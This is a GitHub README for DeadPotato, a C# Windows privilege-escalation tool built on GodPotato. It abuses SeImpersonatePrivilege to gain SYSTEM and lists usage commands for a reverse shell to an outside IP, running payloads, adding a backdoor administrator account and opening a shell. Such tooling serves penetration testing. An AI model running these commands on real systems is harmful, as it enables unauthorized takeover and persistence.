/DeadPotato

DeadPotato is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.

Primary LanguageC#Apache License 2.0Apache-2.0

image

forksBDG starsBDG licenseBDG languageBDG

❗Usage of this program under an unauthorized context is strictly forbidden. The author(s) of DeadPotato do not take any responsibility for any unintentional harm caused to systems. Use with caution. ❗

C:\Users\lypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version b1.0 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITY\SYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)

❔Quick Start - How To Use

The SeImpersonatePrivilege right is enabled in your context? With DeadPotato, it is possible to achieve maximum privileges on the local system.

The tool will attempt to start an elevated process running in the context of the NT AUTHORITY\SYSTEM user by abusing the DCOM's RPCSS flaw in handling OXIDs, allowing unrestricted access over the machine for critical operations to be freely performed.

⚠️ In the following case, the -cmd module is used. Many modules are available for use, such as the -rev IP:PORT for spawning an elevated reverse shell, or -newadmin usr:pass for creating a new local Administrator user for persistence.

cmd_GQJhLcT9IH

Verify SeImpersonatePrivilege rights

In order to use DeadPotato, the SeImpersonatePrivilege right must be enabled in the current context. In order to verify this, the whoami /priv command can be executed. If there privilege is disabled, exploitation is not possible in the current context.

C:\Users\lypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>

🐚 Getting an Elevated Reverse Shell

cmd_XQASCL7Lz6

🏅 Credits

This Project "DeadPotato" is a tool built on the source code of the masterpiece "GodPotato" by BeichenDream. If you like this project, make sure to also go show support to the original project

License

This project is licensed under the MIT License. Please review the LICENSE file for more details.